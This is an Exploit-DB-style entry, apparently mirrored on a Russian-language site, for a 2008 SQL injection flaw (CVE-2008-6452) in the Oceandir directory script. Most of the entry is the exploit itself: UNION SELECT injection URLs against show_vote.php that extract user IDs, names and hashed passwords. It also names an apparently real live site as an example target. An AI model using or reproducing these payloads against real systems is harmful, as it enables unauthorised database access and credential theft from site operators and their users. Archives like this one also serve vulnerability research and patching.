- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 6504
- Проверка EDB
-
- Пройдено
- Автор
- JEEN HACKER TEAM
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-6452
- Дата публикации
- 2008-09-20
Код:
/**
* @title Oceandir <= 2.9 (show_vote.php id) Remote SQL injection
* @author JEEN HACKER TEAM [ Jeen + Secertry ]
* @cost 250$
* @script http://www.oceandir.com
* @copyright 2008
* @homepage http://www.hackteach.org/cc/teach.php
* @email [email protected] , [email protected]
*/
Exploit :
~user
http://www.site.com/dir/show_vote.php?id=-1+union+select+user_id,fname,3,4+from+users
~passwd
http://www.site.com/dir/show_vote.php?id=-1+union+select+1,hashed_pw,3,4+from+users
Example :
####
http://www.dir.qatarw.com/show_vote.php?id=-1+union+select+user_id,fname,3,4+from+users
http://www.dir.qatarw.com/show_vote.php?id=-1+union+select+1,hashed_pw,3,4+from+users
####
Greetz : www.hackteach.org user's
# milw0rm.com [2008-09-20]- Источник
- www.exploit-db.com
